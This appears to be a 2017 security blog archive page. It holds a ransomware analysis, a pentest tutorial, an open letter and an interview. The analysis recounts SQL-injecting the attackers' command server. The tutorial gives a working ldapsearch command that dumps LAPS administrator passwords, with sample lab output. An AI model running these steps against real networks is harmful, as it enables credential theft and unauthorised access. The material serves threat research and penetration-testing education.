Monthly Archives: July 2017

TOPransom: From eMail Attachment to Powning the Attacker’s Database

Hi folks, today I want to share a quick but intensive experience in fighting cybercrime. I wish you would appreciate the entire process from getting an email attachment to powning the ransom server trying to stop the infection and to alert everybody about the found threats. As a second step I would try to identify the attacker in order to give additional information to law enforcements, those actions would not be published. 

But, let's start by having a little bit of context:

During the past few days a colleague of mine (MarcoT.) gave me an interesting eMail attachment called: (sha256:fdd1da3bdd8f37dcc04353913b5b580dadda94ba).
By unzipping the attachment, it was interesting to see a single .vbs file. By double clicking a .vbs file the victim would run it through microsoft wscript.exe which fires up the infection process. The eMail belongs to a more complex spamming set spread over USA and coming few days ago to Europe as well.

The visual basic script was obfuscated, as you may appreciate from the following image, but the used obfuscation technique was quite weak to reverse. In fact only one round of packing was adopted and after few substitutions "clear text strings" were observable.

Obfuscated Dropper

Interesting techniques were introduced in this dropper. First of all a lot of junk code (apparently good code) was added in order to make reverse engineering process much harder. Very interesting the choice of such a code apparently taken from real droppers but not linked to the analized one. Another interesting adopted technique was on the "User-Agent" settings, which happened to be the key-factor to download the real payload.  The dropper per-se is not interesting anymore. It basically uses a romantic WScript.Shell to execute a 'MZ' file once downloaded from compromised websites (IoC later on). The Dropped file is returned directly into the HTTP response body and saved with a static name in temporary user folder: saToHxy.exe. The dropper file renamed VB objects and VB functions to make everything a little harder.

Saving Dropper into user temporary file with static name

As today the dropping URLs are the following ones:
As mentioned a romantic Shell.Run would execute the dropped payload. The Payload (sha356:6a51d0cd9ea189babad031864217ddd3a7ddba84) looks like a one-stager payload. No heavy encryption nor multi staging delivery is involved, clear and intuitive user functions within enabled debugging headers.

No Packing found

Firing up IDA and reversing the sample showed up small encoded payload through XOR and some anti debugging tricks such as the timing control and performance monitoring as follows:

Anti-Debugging tricks: Timing and Performante control
Following on the analysis it becomes clear the spread use of Secure Handler Exception Chain exploiting technique. By triggering exceptions the attacker calls modified exception handler functions able to decode the payload and to allocate it directly on the new memory pages, ending up on "call eax" section. The following image shows the decoding loop.

Decoding Loop on 0x3001220
Following a piece of decoded memory area (configuration file), decoded by 0x03001220.

Decoded Memory Area
Dynamic Analysis took out the evidence of a Ransomware payload. In fact following on the decoded payload by getting far on memory site the analyst could observe the ransom HTML page (next image). I would prefer to show out a rendered "ransom request page" rather than a junk of hexadecimal bytes. (sha256: cdb3fef976270ab235db623d6a4a97ea93c41dd1) The ransom page looks looks like the following image.

Ransom Request Rendered File
I will call this Ransomware the "TOPransom" since the funny and evident mistake the attacker made in writing the ransom request file in where he suggested to download the TOP Browser rather then the TOR Browser :D (LOL). The TOPransom encrypts files and changes the file extensions with a alphanumeric extension, usually made of 3 characters (why "usually" ? Because looking at the attacker's db it looks like that, but I didn't find evidence on that). The modified extension is used as a hidden parameter in the ransom page. The following image shows some hidden features used by the attacker to bring informations to the control server.

POST request to buy the decrypter
Particularly interesting (at least in my persona point o view) the hidden input type called "FB" which looks like piggy backing two informations to the command and control (ransom server) such as: the extension and some hexadecimal content included in a crafted tag called "pre". By clicking on "Yes I want to buy" the victim POST such a data and are prompted to the following page asking for 0.18 BTC in order to get files back.

Request for ransom
 The FB hidden value "made me curious". By changing the first value (the one before the statement "pre") you would appreciate different BTC wallets with different asking prices. The following image shows the different results.

Request for ransom 2

This makes the system vulnerable to "balance enumeration" and to "denial of resources". In fact by enumerating the attacker wallet space I will perform a duplice action: if the wallet exists I'll take its balance, if the wallet does not exists the backend will create a new wallet, filling up the attacker reserved space for wallet creation. This action could block the new wallet creation ergo new infections.  So lets' write a simple dirty python script to force new wallet creation and money mapping.

Forcing New Wallets to limitate further infections (please do not consider this script as production ready script. Do not consider it as best implementation for such a goal)

Following on the analysis by playing a little bit further with that parameter (FB) I figured out it was vulnerable to SQL Injection. What a nice surprise !! The vulnerable parameter was the crafted tag called "pre" which vulnerable to code injection, which triggered SQLinjections.

SQLi on C&C server !

So let's try to pown the Attacker ! As first sight you may observe a MySQL error with not a latin characters. Google Translator says it is a Russian language ! Now we know that the attacker belongs, with high probability, to the Russian community. By investigating a little bit harder on the DB, only TOR availability and super slow, I found the botids and the relatives tasks. Please have a look to incremental ids and try to immagine how big was that network.

Bot Ids and relative locations

Another interesting topic was to investigate which were the system users(a.k.a the attackers). In other words the users of such a ransomware-as-a-service-platform" which happened to be the real attackers. Since It looks like a "Ransomware as a service" platform figuring out how many dollars the attackers were able to gain over time its my next goal. The following obfuscated image shows some of the found usernames, passwords (chipertext) and wallets the attackers used to gain profit.

Attackers Username, Passwords and Wallets
My attention ended up on that guy:
That guy is related to the following private wallet: 1P3t56jg5RQSkFDWkDK3xBj9JPtXhSwc3N

As you might guess there are two main wallet types:
- Public wallets which store the victim's money. They are the public available wallets, everybody got infected must now them in order to pay the ransom.
- Private wallets which are the "real ones" belonging to attackers.  Private wallets got money from public wallet once reached the end of the attack. Platform charges are applied during that transaction.

Having the private wallet means to have the possibility to track down transactions history. Transactions history is a great source to figure out if that guy made more illegal activity over the past months. Following the 's private wallet. We may observe interesting transactions as showed in the following image

Transaction From   1P3t56jg5RQSkFDWkDK3xBj9JPtXhSwc3N

That wallet which is DB-related to, made huge amount of transactions back on 2017-04-23 and 2017-04-20 by moving out from its wallet 81,87 BTC harvested by many small and similar transactions! If we include the harvested BTC from this attack which currently have balance 13 BTC,  he or she is close to 100 BTC transactions. How about 2017-04 (do you remember any famous attack on that time ? :P) With high probability the attacker looks like abusing illegal activities (such as ransomware activities) more then once a time, this boy/girl -- with a high probability -- is a recurring attacker. By investigating a little bit more on that email address it's easy to find heavy relations between and which is a Russian based Market Place where attackers buy and sell attacking tools, information and experiences.

After few more crafted SQL queries I was able to extract the "inst" talbe. Fields names are the following ones:


Yes come one ! This table records the infected clients, let's see if we can do something to help them ! 
A simple DB count showed me more 2k infections so far. Not bad for being a plain new ransomware  as a service. The Targets look like being very spread all over the world. So far it's possible to extract the following country distribution.

TOPransom Victims Distribution

I will not disclosure IP addresses in order to guarantee victims privacy. Another interesting data comes from the victim browser distribution (another parameter collected by the attacker). Curiously the most used browser on windows devices is Chrome as the following image shows. [remember] The infection vector wasn't through web browser but through wscript.exe which opens .vbs by double click on it. [/remember]

TOPransomware victims browser distribution

On this post I've been describing the activity that took me from an email attachment to drop the entire attacker's database on a Ransomware as a Service platform that I called TOPransom. I've being trying to enumerate attacker's income and to mitigate the spreading vector by filling up wallets creation per user by writing a quick and durty python script.

Following IoC for your detection systems. Have fun !

IoC (summing up):
  • dropper .vba (sha256:fdd1da3bdd8f37dcc04353913b5b580dadda94ba)
  • saToHxy.exe (sha256:6a51d0cd9ea189babad031864217ddd3a7ddba84)
  • RECOVER-FILES-html (sha256: cdb3fef976270ab235db623d6a4a97ea93c41dd1)
  • Bot location:
  • Bot Location:
  • TOP Browser

Dump LAPS passwords with ldapsearch

If you’ve ever been pentesting an organization that had LAPS, you know that it is the best solution for randomizing local administrator passwords on the planet. (You should just be leaving them disabled).

LAPS stores it’s information in Active Directory:

  • The expiration time: ms-Mcs-AdmPwdExpirationTime: 131461867015760024

  • And the actual password in clear text: ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(

When LAPS first came it, any user in Active Directory could read it. Microsoft fixed that, you now have to have the All extended rights permission to the object or Full Control of it.

In many organizations, there are pockets of OU admins, or even standard users that are in charge of a specific set of Users and (in particular) computers in which they have full control over.

There is already a Metasploit module thanks to Meatballs: But, unfortunately I don’t always have access to a Meterpreter session to run the module.

Using ldapsearch (which is included in the package ldapscripts on Debian/Ubuntu) can be used to make the same query that the module does. Here is an example run:

ldapsearch -x -h -D \
"helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" \
"(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

Lets break this down:

  • -x - Use basic authentication
  • -h - Connect to the Domain Controller for ldap
  • -D "helpdesk" -w ASDqwe123 - Login as the helpdesk user, with the password ASDqwe123
  • -b "dc=sittingduck,dc=info" - This loads the base LDAP object of the entire domain.
  • "(ms-MCS-AdmPwd=*)" - Filter out any objects that I can’t see a value for ms-MCS-AdmPwd for. (If you have rights as that user to see even one Administrator password, this will show it.)
  • ms-MCS-AdmPwd - Only show me the ms-MCS-AdmPwd object (which by default includes the object name and DN so you will still know what host it belongs to)

What does that look like?

$ ldapsearch -x -h -D "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# extended LDIF
# LDAPv3
# base <dc=sittingduck,dc=info> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd

# DC1, Domain Controllers,
dn: CN=DC1,OU=Domain Controllers,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 2F1i/++N0H+G]{Y&,F

# SDCLIENT_DAWIN7, LabComputers, Lab,
dn: CN=SDCLIENT_DAWIN7,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 8CDR4,2UE8BA{zw2@RR

# SD_WSUS_2012, LabComputers, Lab,
dn: CN=SD_WSUS_2012,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: +3!UY5@g9B.64RV2z/T

# WIN-PM0ID6F0AHN, LabComputers, Lab,
dn: CN=WIN-PM0ID6F0AHN,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(

# search reference
ref: ldap://,DC=sittingduck,DC=info

# search reference
ref: ldap://,DC=sittingduck,D

# search reference
ref: ldap://,DC=sittingduck,D

# search reference
ref: ldap://,DC=sittingduck,DC=info

# search result
search: 2
result: 0 Success

Now, just having the local admin password doesn’t ensure that it’s enabled, but there is a good bet that you are good to go now.

P.S. You can also authenticate using Kerberos (think Golden/Silver tickets)

P.P.S Because Windows doesn’t (to the best of my knowledge) require signing on Domain Controllers for LDAP connections yet (probably does in 2016 or will soon), with a little bit of coding you can get ntlmrelayx to dump LAPS passwords ;-)

A Letter to President Donald Trump regarding Global and Cyber Security

Dear President Trump,

Hello. As President of Paramount Defenses, I pen this letter most respectfully to you, the President of our Great United States.

First off, I should mention that I write neither as a Republican, nor as a Democrat, but as a fellow patriotic American citizen and a cyber security specialist, because I care, and that my desire to do so publicly is inspired by how much you Sir share publicly, and that this most respectful letter is in light of your tweet about discussing the creation of a Cyber Security Unit with Russia.

I'll do my best to keep this VERY simple.

Top-5 Global Security Risks

As President of the United States, you're likely aware of the Top-5 risks to not just America, but to the entire world today -

1. The Risk of the Use of a WMD / Nuclear War
2. The Risk of Earth's Demise, posed by Climate Change
3. The Risk of Terrorism, posed by Terror Groups Worldwide
4. The Risk of the Decline of American Leadership in the World
5. The Risk of Swift and Colossal Damage, posed by Cyber Threats

I am by no means an expert on global security, but common sense suggest that risks 1 and 2 above would be catastrophic to all of mankind, risk 3 could pose a serious threat to life and property, and that risk 4 could increase the likelihood of risks 1, 2 & 3.

As for risk 5, I do happen to know one vital area of cyber security decently well, so I'll share just a few thoughts about it, but first, I did want to take a moment to talk about risk 4 because it potentially impacts the lives of 7,000,000,000+ people worldwide.

The Importance of American Leadership

Mr. Trump, as President of the United States, you are the most powerful and influential person in the world, and most people would take such GREAT responsibility VERY seriously, since their actions and decisions could save or destroy the world.

Sir, the elections are over. You won. You are the President of the United States, and it is time to let the talking be, and start working to make America great again. This isn't reality TV, this is real life, and its a billion times more significant and serious.

If I were the President of the United States, and I deeply cared about making America great again, I likely wouldn't have a moment to watch TV, Tweet or Golf. I'd be working harder than the hardest American to make America greater and safer.

(If I may momentarily digress. speaking of making America great again, while there likely may certainly be much to be done to restore its greatness, we owe it to our future generations to do so without polluting or endangering our precious environment.)

Today more than ever, we live in a precarious, highly-connected and inter-dependent world, and the world needs strong, mature and steady American leadership to amicably address so many important and complicated issues, such as those listed above.

Speaking of which, I'd like to share a few thoughts on risk 5, the risk of swift and colossal damage posed by Cyber Threats, but before I do so, again, I'd request you to please take a few moments to comprehend the profound importance, seriousness and significance of both, the position bestowed upon you by the American people, as well as (of) the challenges that you, Sir, today have the unique privilege and responsibility of addressing for both America and the world that America is inextricably a part of.

[ Hopefully you see that the reality is that since America is inextricably a part of the world, what happens out in the world could impact us substantially, so to make America great(er and safer) again, we must maintain American leadership in the world. ]

The Cyber Risk

Mr. President, to put it most simply, Cyber Security is the Achilles' Heel of developed nations today, because over the last few decades, our reliance on computer systems and networks has increased substantially (exponentially), and sadly within them exist many systemic and component specific deficiencies (vulnerabilities) which can be exploited to inflict colossal harm.

(This risk is actually addressable, and what the world needs is a White Knight so we have a trustworthy foundation to operate on, but and until we get there i.e. until the world has such a defensive shield in place to rely on, we all have reality to deal with.)

Consequently, today from our governments to our energy grids, from our defense systems to our transportation systems, and from our banks to our industries (i.e. a nation's business organizations), literally everything is exposed to varying levels of risk.

It is thus hardly surprising that today cyber security is one of the most important challenges the world faces, an assertion best evidenced by the fact that Russia's purported cyber interference in the 2016 American elections, remains a contentious issue.

Speaking of which, while the U.S and in fact all countries and, ideally all business organizations, should certainly bolster their cyber defenses, establishing a Cyber Security Unit with the Russians might NOT be such a good idea, as also voiced by 1, 23.

By the way, those who truly understand cyber security know that there is no such thing as an "impenetrable cyber security unit".

A quick digression. Yes, indeed the Russians are very good at cyber security and likely at hacking, and they're persistent, but they're not the only ones out there trying to hack our agencies and companies, and they don't always succeed. But, I digress.

Mr. President, you may likely already have some of the world's best inputs and advice when it comes to cyber security, so I'd just like to share paramount cyber security insight with you - Trillion-Dollar Cyber Security Insight for President Donald Trump.

Mr. President, as I put my pen down, I'll only add that of the risks listed above, in the near-term, the Cyber Risk may be 2nd only to the Nuclear Risk, because its realistic probability of occurrence is substantially higher, and its potential for damage, colossal.

Mr. Trump, you have a historic opportunity to SERVE the American People, and define your legacy - its yours to embrace or squander.


Security Affairs Questions

Soon after I blogged about the “Snagging Creds from Locked Machines” and it went a bit viral for a day, Pierluigi Paganini from asked me some great questions, that I failed to answer in a timely manner. They are probably a lot less useful to him now (8 months late), but I thought I would answer them anyways.

You are one of the most respected experts on cyber security. Could you tell me what your technical background is and when you started hacking?

I think my earliest “hacking” was cheating at video games. I enjoyed learning the mechanics of how the Game Genie and GameShark worked, and how I could cheat at games much more than playing them. My parents always thought that I ruined the games, but it really was the figuring out how to get the right hex for infinite life or ammo that was the game for me.

After that I owe my traditional IT / Security learning to the Marine Corps 0651 and 0656 schools, the amazingly patient Marines and civilians at the MARCERT, the OSCP and Chris Gates’ blog.

What was your greatest hacking challenge?

My “greatest hacking challenge” I would say is myself. Self awareness is an ever progressing goal, I attempt to figure out and make myself better every day. I fail at it a lot, but all the best hacks are pure and simple perseverance and I plan to never let this one have the better of me.

What are the 4 tools that cannot be missed in the hacker’s arsenal and why?

So much troll ammo in that question. Or I could go the philosophical route and talk about the mind, and never giving up, but I’ll take the question at face value:

  1. A programming language. Yes, you don’t have to know programming to be in “Information Security” but to be a “hacker” (in the sense of breaking into systems), knowing a language will save you when the tool that you need for a very specific use case just doesn’t exist. It also helps you when you run into a tool that is broken, that everyone seems to use, but for some reason you are the only one noticing it’s broken.
  2. An Intel NUC (or other computer) with ESXi (or other virtualization) on it. Having a lab, even on a hand-me-down laptop/computer with Virtualbox and trial copies of Windows, I was able to learn more by building whatever application I was trying break into, than I ever would have by poking at it from the Internet.
  3. A blog. I forget things all the time and I usually use my blog or another note taking method (pen and paper, text editor, telling friends about it), to be able to reference it later when I need it. Even if you are the only reader of your own blog it is hands down one of the best method of learning for me because it forces me to re-do things and revisit my assumptions.
  4. Metasploit. Mostly because it makes things dead simple, and learning to use it isn’t very hard.

Which are the most interesting hacking communities on the web today?

I’ve never really been welcome or even interested in the darker side of hacking communities. I would get caught if I even tried to dive into that world.

To know one’s limitations is to know one’s self

However, I run NoVAHackers with Chris Gates so I would be remiss to not mention it, and it’s parent AHA. Both are great communities with basically a mini-conference every month at the meetings.

If you don’t have a hacker space, or “Hackers Association” in your area, first, look harder there probably is one that you just haven’t found yet, and second, if not, start it. I went to the first 2 or 3 meetings of NoVA Hackers by myself. Don’t be deterred by single digit membership or attendance. NoVA Hackers is near ~700 members + another 500 or so alumni since it started in 2009.

Which is the industry (healthcare, automotive, telecommunication, banking, and so on) most exposed to cyber attacks and why?

Honestly I don’t want to answer this. Why would you point at someone and say “hit him, he’s easier to take down”

What scares you more in the Internet?

The fact that people think it’s a weapon for or against them.

We often hear about cyber weapons and cyber attacks against critical infrastructure. Do you believe concrete the risk of a major and lethal cyber attack against a critical infrastructure?

Yes, but in what country? Is the U.S. even the most connected these days? I doubt it. In counter point I would like you to watch the following for actual statistics on the matter by @SpaceRogue:

Why and which are the most exposed CI?

Same issue with the industry question, not going to point at the weakest link. I guess an argument to the fact that making light of these targets helps to force action, but I think unless you have had your head in the sand every knows of “Cyber Threats” these days, and a heading like:

Security Expert Rob Fuller says that Widgets are the most vulnerable target in U.S. Infrastructure

doesn’t really further any message or get anyone’s attention to something they don’t already know.

Thanks for your time. Have an awesome 4th of July.